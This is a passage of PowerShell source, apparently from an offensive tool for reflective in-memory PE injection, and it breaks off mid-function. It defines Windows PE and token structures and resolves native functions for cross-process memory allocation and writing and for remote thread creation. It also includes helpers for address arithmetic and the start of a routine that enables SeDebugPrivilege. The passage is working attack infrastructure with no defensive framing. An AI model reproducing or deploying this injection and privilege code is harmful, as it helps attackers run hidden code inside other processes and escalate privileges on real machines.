$TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR\n\n\t\t#Struct IMAGE_EXPORT_DIRECTORY\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY\n\t\t\n\t\t#Struct LUID\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)\n\t\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n\t\t$LUID = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID\n\t\t\n\t\t#Struct LUID_AND_ATTRIBUTES\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)\n\t\t$TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n\t\t$LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES\n\t\t\n\t\t#Struct TOKEN_PRIVILEGES\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)\n\t\t$TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null\n\t\t$TOKEN_PRIVILEGES = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES\n\n\t\treturn $Win32Types\n\t}\n\n\tFunction Get-Win32Constants\n\t{\n\t\t$Win32Constants = New-Object System.Object\n\t\t\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0\n\t\t\n\t\treturn $Win32Constants\n\t}\n\n\tFunction Get-Win32Functions\n\t{\n\t\t$Win32Functions = New-Object System.Object\n\t\t\n\t\t$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc\n\t\t$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n\t\t$VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc\n\t\t\n\t\t$VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx\n\t\t$VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n\t\t$VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx\n\t\t\n\t\t$memcpyAddr = Get-ProcAddress msvcrt.dll memcpy\n\t\t$memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])\n\t\t$memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy\n\t\t\n\t\t$memsetAddr = Get-ProcAddress msvcrt.dll memset\n\t\t$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n\t\t$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset\n\t\t\n\t\t$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA\n\t\t$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary\n\t\t\n\t\t$GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress\n\t\t$GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])\n\t\t$GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress\n\t\t\n\t\t$GetProcAddressOrdinalAddr = Get-ProcAddress kernel32.dll GetProcAddress\n\t\t$GetProcAddressOrdinalDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])\n\t\t$GetProcAddressOrdinal = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressOrdinalAddr, $GetProcAddressOrdinalDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressOrdinal -Value $GetProcAddressOrdinal\n\t\t\n\t\t$VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree\n\t\t$VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])\n\t\t$VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree\n\t\t\n\t\t$VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx\n\t\t$VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])\n\t\t$VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx\n\t\t\n\t\t$VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect\n\t\t$VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])\n\t\t$VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect\n\t\t\n\t\t$GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA\n\t\t$GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t$GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle\n\t\t\n\t\t$FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary\n\t\t$FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t\t$FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary\n\t\t\n\t\t$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n\t    $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t    $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess\n\t\t\n\t\t$WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject\n\t    $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])\n\t    $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject\n\t\t\n\t\t$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory\n        $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n        $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory\n\t\t\n\t\t$ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory\n        $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n        $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory\n\t\t\n\t\t$CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread\n        $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])\n        $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread\n\t\t\n\t\t$GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread\n        $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])\n        $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread\n\t\t\n\t\t$OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken\n        $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])\n        $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken\n\t\t\n\t\t$GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread\n        $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])\n        $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread\n\t\t\n\t\t$AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges\n        $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])\n        $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges\n\t\t\n\t\t$LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA\n        $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])\n        $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue\n\t\t\n\t\t$ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf\n        $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])\n        $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf\n\t\t\n        # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP\n        if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {\n\t\t    $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx\n            $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])\n            $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx\n        }\n\t\t\n\t\t$IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process\n        $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])\n        $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process\n\t\t\n\t\t$CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread\n        $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])\n        $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread\n\t\n\t\t$LocalFreeAddr = Get-ProcAddress kernel32.dll VirtualFree\n\t\t$LocalFreeDelegate = Get-DelegateType @([IntPtr])\n\t\t$LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name LocalFree -Value $LocalFree\n\n\t\treturn $Win32Functions\n\t}\n\t#####################################\n\n\t\t\t\n\t#####################################\n\t###########    HELPERS   ############\n\t#####################################\n\n\t#Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function\n\t#This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses\n\tFunction Sub-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t$Val = $Value1Bytes[$i] - $CarryOver\n\t\t\t\t#Sub bytes\n\t\t\t\tif ($Val -lt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\t$Val += 256\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t[UInt16]$Sum = $Val - $Value2Bytes[$i]\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot subtract bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\t\n\n\tFunction Add-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t#Add bytes\n\t\t\t\t[UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t\t\n\t\t\t\tif (($Sum -band 0xFF00) -eq 0x100)\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot add bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\t\n\n\tFunction Compare-Val1GreaterThanVal2AsUInt\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\tfor ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)\n\t\t\t{\n\t\t\t\tif ($Value1Bytes[$i] -gt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\treturn $true\n\t\t\t\t}\n\t\t\t\telseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\treturn $false\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot compare byte arrays of different size\"\n\t\t}\n\t\t\n\t\treturn $false\n\t}\n\t\n\n\tFunction Convert-UIntToInt\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[UInt64]\n\t\t$Value\n\t\t)\n\t\t\n\t\t[Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)\n\t\treturn ([BitConverter]::ToInt64($ValueBytes, 0))\n\t}\n\t\n\t\n\tFunction Test-MemoryRangeValid\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[String]\n\t\t$DebugString,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$StartAddress,\n\t\t\n\t\t[Parameter(ParameterSetName = \"Size\", Position = 3, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$Size\n\t\t)\n\t\t\n\t    [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))\n\t\t\n\t\t$PEEndAddress = $PEInfo.EndAddress\n\t\t\n\t\tif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)\n\t\t{\n\t\t\tThrow \"Trying to write to memory smaller than allocated address range. $DebugString\"\n\t\t}\n\t\tif ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)\n\t\t{\n\t\t\tThrow \"Trying to write to memory greater than allocated address range. $DebugString\"\n\t\t}\n\t}\n\t\n\t\n\tFunction Write-BytesToMemory\n\t{\n\t\tParam(\n\t\t\t[Parameter(Position=0, Mandatory = $true)]\n\t\t\t[Byte[]]\n\t\t\t$Bytes,\n\t\t\t\n\t\t\t[Parameter(Position=1, Mandatory = $true)]\n\t\t\t[IntPtr]\n\t\t\t$MemoryAddress\n\t\t)\n\t\n\t\tfor ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)\n\t\t{\n\t\t\t[System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])\n\t\t}\n\t}\n\t\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-DelegateType\n\t{\n\t    Param\n\t    (\n\t        [OutputType([Type])]\n\t        \n\t        [Parameter( Position = 0)]\n\t        [Type[]]\n\t        $Parameters = (New-Object Type[](0)),\n\t        \n\t        [Parameter( Position = 1 )]\n\t        [Type]\n\t        $ReturnType = [Void]\n\t    )\n\n\t    $Domain = [AppDomain]::CurrentDomain\n\t    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n\t    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n\t    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n\t    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n\t    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n\t    $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\t    \n\t    Write-Output $TypeBuilder.CreateType()\n\t}\n\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-ProcAddress\n\t{\n\t    Param\n\t    (\n\t        [OutputType([IntPtr])]\n\t    \n\t        [Parameter( Position = 0, Mandatory = $True )]\n\t        [String]\n\t        $Module,\n\t        \n\t        [Parameter( Position = 1, Mandatory = $True )]\n\t        [String]\n\t        $Procedure\n\t    )\n\n\t    # Get a reference to System.dll in the GAC\n\t    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n\t        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n\t    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t    # Get a reference to the GetModuleHandle and GetProcAddress methods\n\t    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n\t    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n\t    # Get a handle to the module specified\n\t    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n\t    $tmpPtr = New-Object IntPtr\n\t    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n\t    # Return the address of the function\n\t    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n\t}\n\t\n\t\n\tFunction Enable-SeDebugPrivilege\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, 